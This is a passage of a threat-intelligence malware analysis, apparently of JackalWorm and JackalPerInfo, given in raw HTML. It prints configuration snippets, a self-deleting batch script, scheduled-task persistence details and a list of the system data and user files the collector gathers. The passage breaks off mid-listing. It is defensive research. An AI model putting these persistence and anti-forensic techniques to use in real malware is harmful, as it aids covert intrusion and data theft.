class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> &lt;Resource type="install" interval="15" ext="exe" data="rcdata02" /&gt;</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946799b638886407-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946799b638886407-1"><span class="crayon-h">&lt;</span><span class="crayon-e">Resource </span><span class="crayon-i">type</span>=<span class="crayon-s">"install"</span><span class="crayon-h"> </span><span class="crayon-i">interval</span>=<span class="crayon-s">"15"</span><span class="crayon-h"> </span><span class="crayon-i">ext</span>=<span class="crayon-s">"exe"</span><span class="crayon-h"> </span><span class="crayon-i">data</span>=<span class="crayon-s">"rcdata02"</span><span class="crayon-h"> </span>/<span class="crayon-h">&gt;</span></div></div></td> </tr> </table> </div> </div><p> In this case, the worm was configured to install the PE file stored in another resource &#8220;rcdata02&#8221;, save it with the extension .exe and create a scheduled task to run it every 15 minutes.</p> <p>Other valid examples are:</p> <div id="crayon-67b40d946799c204772651" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> &lt;Resource type="process" file="%TMP%\test.exe" args="" data="rcdata02" /&gt;</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946799c204772651-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946799c204772651-1"><span class="crayon-h">&lt;</span><span class="crayon-e">Resource </span><span class="crayon-i">type</span>=<span class="crayon-s">"process"</span><span class="crayon-h"> </span><span class="crayon-i">file</span>=<span class="crayon-s">"%TMP%\test.exe"</span><span class="crayon-h"> </span><span class="crayon-i">args</span>=<span class="crayon-s">""</span><span class="crayon-h"> </span><span class="crayon-i">data</span>=<span class="crayon-s">"rcdata02"</span><span class="crayon-h"> </span>/<span class="crayon-h">&gt;</span></div></div></td> </tr> </table> </div> </div><p> Drops the PE file stored in another resource &#8220;rcdata02&#8221; in &#8220;%TEMP%\test.exe&#8221; and executes it.</p> <div id="crayon-67b40d946799d721795282" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> &lt;Resource type="process" file="%WINDIR%\system32\ping.exe" args="1.1.1.1"/&gt;</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946799d721795282-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946799d721795282-1"><span class="crayon-h">&lt;</span><span class="crayon-e">Resource </span><span class="crayon-i">type</span>=<span class="crayon-s">"process"</span><span class="crayon-h"> </span><span class="crayon-i">file</span>=<span class="crayon-s">"%WINDIR%\system32\ping.exe"</span><span class="crayon-h"> </span><span class="crayon-i">args</span>=<span class="crayon-s">"1.1.1.1"</span>/<span class="crayon-h">&gt;</span></div></div></td> </tr> </table> </div> </div><p> Executes the program &#8220;%WINDIR%\system32\ping.exe&#8221; with the argument &#8220;1.1.1.1&#8221;.</p> <p>In our investigations, we observed only the first example and the malware was configured to install the JackalControl Trojan.</p> <p>The installation procedure selects the malware location in much the same way as the procedure described in the <a href="#Installer_mode">section above</a>. It differs from the other one because it enumerates the subdirectories in CommonAppData only and copies the file using the subdirectory&#8217;s names concatenated with another static value, upd.exe.</p> <p>If it fails, it tries with a list of hard-coded directory names, which is a bit different from the procedure described above.</p> <ul> <li>Google</li> <li>Mozilla</li> <li>Adobe</li> <li>Intel</li> <li>[Random GUID]</li> </ul> <p>The worm maintains its persistence by creating a scheduled task with a hard-coded XML template dynamically modified at runtime. Once installed, the worm deletes itself from the removable drive by using a batch script. The script is dropped in the local Temp directory with a random name:</p> <div id="crayon-67b40d946799e058679183" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> @echo off @chcp 65001&gt;nul :check @tasklist | findstr /i "%executingFilename%" &gt;nul @if %errorlevel%==0 goto check @del /f /q /a h "%executingPath%" @del /f /q "%Temp%\%randomname%.bat"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d946799e058679183-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946799e058679183-2">2</div><div class="crayon-num" data-line="crayon-67b40d946799e058679183-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946799e058679183-4">4</div><div class="crayon-num" data-line="crayon-67b40d946799e058679183-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d946799e058679183-6">6</div><div class="crayon-num" data-line="crayon-67b40d946799e058679183-7">7</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d946799e058679183-1"><span class="crayon-sy">@</span><span class="crayon-e">echo </span><span class="crayon-i">off</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946799e058679183-2"><span class="crayon-sy">@</span><span class="crayon-i">chcp</span><span class="crayon-h"> </span><span class="crayon-cn">65001</span><span class="crayon-h">&gt;</span><span class="crayon-i">nul</span></div><div class="crayon-line" id="crayon-67b40d946799e058679183-3"><span class="crayon-sy">:</span><span class="crayon-i">check</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946799e058679183-4"><span class="crayon-sy">@</span><span class="crayon-i">tasklist</span><span class="crayon-h"> </span><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-i">findstr</span><span class="crayon-h"> </span>/<span class="crayon-i">i</span><span class="crayon-h"> </span><span class="crayon-s">"%executingFilename%"</span><span class="crayon-h"> </span><span class="crayon-h">&gt;</span><span class="crayon-i">nul</span></div><div class="crayon-line" id="crayon-67b40d946799e058679183-5"><span class="crayon-sy">@</span><span class="crayon-st">if</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">errorlevel</span><span class="crayon-sy">%</span>==<span class="crayon-cn">0</span><span class="crayon-h"> </span><span class="crayon-st">goto</span><span class="crayon-h"> </span><span class="crayon-i">check</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d946799e058679183-6"><span class="crayon-sy">@</span><span class="crayon-i">del</span><span class="crayon-h"> </span>/<span class="crayon-i">f</span><span class="crayon-h"> </span>/<span class="crayon-i">q</span><span class="crayon-h"> </span>/<span class="crayon-i">a</span><span class="crayon-h"> </span><span class="crayon-i">h</span><span class="crayon-h"> </span><span class="crayon-s">"%executingPath%"</span></div><div class="crayon-line" id="crayon-67b40d946799e058679183-7"><span class="crayon-sy">@</span><span class="crayon-i">del</span><span class="crayon-h"> </span>/<span class="crayon-i">f</span><span class="crayon-h"> </span>/<span class="crayon-i">q</span><span class="crayon-h"> </span><span class="crayon-s">"%Temp%\%randomname%.bat"</span></div></div></td> </tr> </table> </div> </div><p> Future removable drives that are attached will be re-infected with JackalWorm.</p> <p>It is also worth mentioning that this tool seems to be under development. We deduced this by analyzing the embedded .NET resources of the file 5DE309466B2163958C2E12C7B02D8384. Their size is 193973 bytes, which is much bigger than their actual content:</p> <ul> <li>Rcdata01 – XML config &#8211; Size: 67 bytes</li> <li>Rcdata02 – JackalControl Trojan &#8211; Size: 27136 bytes</li> </ul> <p>It means there are 166770 bytes of unknown data. Most of them are part of the legitimate notepad.exe Windows utility, and specifically, the first 0x6A30 bytes were overwritten. After the legitimate notepad.exe image, we found also the following XML configurations:</p> <div id="crayon-67b40d94679a0392055782" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> &lt;Resource type="scheduler" interval="15" ext="exe" args="" data="notepad" /&gt;</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a0392055782-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a0392055782-1"><span class="crayon-h">&lt;</span><span class="crayon-e">Resource </span><span class="crayon-i">type</span>=<span class="crayon-s">"scheduler"</span><span class="crayon-h"> </span><span class="crayon-i">interval</span>=<span class="crayon-s">"15"</span><span class="crayon-h"> </span><span class="crayon-i">ext</span>=<span class="crayon-s">"exe"</span><span class="crayon-h"> </span><span class="crayon-i">args</span>=<span class="crayon-s">""</span><span class="crayon-h"> </span><span class="crayon-i">data</span>=<span class="crayon-s">"notepad"</span><span class="crayon-h"> </span>/<span class="crayon-h">&gt;</span></div></div></td> </tr> </table> </div> </div><p> </p> <div id="crayon-67b40d94679a1101558934" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> &lt;Resource type="process" file="cmd.exe" args="/c echo TEST &gt; %USERPROFILE%\Desktop\test.txt" /&gt;</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a1101558934-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a1101558934-2">2</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a1101558934-1"><span class="crayon-h">&lt;</span><span class="crayon-e">Resource </span><span class="crayon-i">type</span>=<span class="crayon-s">"process"</span><span class="crayon-h"> </span><span class="crayon-i">file</span>=<span class="crayon-s">"cmd.exe"</span><span class="crayon-h"> </span><span class="crayon-i">args</span>=<span class="crayon-s">"/c echo TEST &gt; </span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a1101558934-2"><span class="crayon-s">%USERPROFILE%\Desktop\test.txt"</span><span class="crayon-h"> </span>/<span class="crayon-h">&gt;</span></div></div></td> </tr> </table> </div> </div><p> The first XML shows a new type value: &#8216;scheduler&#8217;, which is not specified in the code. The second XML shows that this specific resource was used for testing purposes and the attacker was trying to run cmd.exe to write the word &#8220;TEST&#8221; in a text file in the desktop: %USERPROFILE%\Desktop\test.txt.</p> <h2 id="jackalperinfo">JackalPerInfo</h2> <p>This malware was developed to collect information about the compromised system, as well as a specific set of files that could potentially be used to retrieve stored credentials and the user&#8217;s web activities. The attacker named it &#8220;perinfo&#8221;, a contraction of the program&#8217;s main class name PersonalInfoContainer.</p> <p>Its behaviour changes according to the number of arguments provided during execution. Specifically, when executed with only one argument, the malware collects a predefined set of information and stores it in a binary file compressed with GZIP. The filename is specified in the argument provided. When executed with two arguments, the malware uses the first argument to load a previously generated binary file and extract all the information to a directory specified by the second argument.</p> <p>By default, the program should be executed with one argument. Once it is executed, the malware starts collecting information about the system using a specific function, GetSysInfo, which collects the following information:</p> <div id="crayon-67b40d94679a2497161524" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-mixed-highlight" title="Contains Mixed Languages"></span><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> Computer name: %s OS version: %S Domain: %S User: %S Local time: %s Interfaces: %Interface Name% DESC: TYPE: MAC: IP: GW: DNS: DHCP: DOMAIN: Remote IP: Current directory: Drives: C:\ Fixed D:\ CDRom ... Applications: %Installed Application1% %Installed Application2% ... Processes: %Process Name 1% Desc: %s Name: %s Path: %s %Process Name 2% ...</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-2">2</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-4">4</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-6">6</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-8">8</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-10">10</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-12">12</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-14">14</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-15">15</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-16">16</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-17">17</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-18">18</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-19">19</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-20">20</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-21">21</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-22">22</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-23">23</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-24">24</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-25">25</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-26">26</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-27">27</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-28">28</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-29">29</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-30">30</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-31">31</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d94679a2497161524-32">32</div><div class="crayon-num" data-line="crayon-67b40d94679a2497161524-33">33</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d94679a2497161524-1"><span class="crayon-e">Computer </span><span class="crayon-i">name</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">s</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-2"><span class="crayon-e">OS </span><span class="crayon-i">version</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">S</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-3"><span class="crayon-i">Domain</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">S</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-4"><span class="crayon-i">User</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">S</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-5"><span class="crayon-e">Local </span><span class="crayon-i">time</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">s</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-6"><span class="crayon-i">Interfaces</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-7"><span class="crayon-ta">%</span><span class="crayon-i">Interface</span><span class="crayon-h"> </span><span class="crayon-i">Name</span><span class="crayon-sy">%</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-8">&nbsp;</div><div class="crayon-line" id="crayon-67b40d94679a2497161524-9"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">DESC</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-10"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">TYPE</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-11"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">MAC</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-12"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">IP</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-13"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">GW</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-14"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">DNS</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-15"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">DHCP</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-16"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">DOMAIN</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-17"><span class="crayon-e">Remote </span><span class="crayon-i">IP</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-18"><span class="crayon-e">Current </span><span class="crayon-i">directory</span><span class="crayon-sy">:</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-19"><span class="crayon-i">Drives</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-20"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">C</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-h"> </span><span class="crayon-i">Fixed</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-21"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">D</span><span class="crayon-sy">:</span><span class="crayon-sy">\</span><span class="crayon-h"> </span><span class="crayon-i">CDRom</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-22"><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">.</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-23"><span class="crayon-i">Applications</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-24"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-sy">%</span><span class="crayon-e">Installed </span><span class="crayon-i">Application1</span><span class="crayon-sy">%</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-25"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-sy">%</span><span class="crayon-e">Installed </span><span class="crayon-i">Application2</span><span class="crayon-sy">%</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-26"><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">.</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-27"><span class="crayon-i">Processes</span><span class="crayon-sy">:</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-28"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-sy">%</span><span class="crayon-e">Process </span><span class="crayon-i">Name</span><span class="crayon-h"> </span><span class="crayon-cn">1</span><span class="crayon-sy">%</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-29"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">Desc</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">s</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-30"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">Name</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">s</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-31"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-i">Path</span><span class="crayon-sy">:</span><span class="crayon-h"> </span><span class="crayon-sy">%</span><span class="crayon-i">s</span></div><div class="crayon-line crayon-striped-line" id="crayon-67b40d94679a2497161524-32"><span class="crayon-h">&nbsp;&nbsp;&nbsp;&nbsp;</span><span class="crayon-sy">%</span><span class="crayon-e">Process </span><span class="crayon-i">Name</span><span class="crayon-h"> </span><span class="crayon-cn">2</span><span class="crayon-sy">%</span></div><div class="crayon-line" id="crayon-67b40d94679a2497161524-33"><span class="crayon-sy">.</span><span class="crayon-sy">.</span><span class="crayon-sy">.</span></div></div></td> </tr> </table> </div> </div><p> This specific function was also observed in the first JackalControl variants, but was removed from newer variants.</p> <p>The malware continues its operation by enumerating the logical drives on the system; and for each one it enumerates the files in the root path. The collected info includes the last write time, the filename, and the file size.</p> <p>It then enumerates the Users directory in the system drive, usually C:\Users\. For each user, it enumerates the content of the following directories:</p> <ul> <li>Desktop</li> <li>Documents</li> <li>Downloads</li> <li>AppData\Roaming\Microsoft\Windows\Recent</li> </ul> <p>It tries also to acquire the following files:</p> <div id="crayon-67b40d94679a3896987430" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px 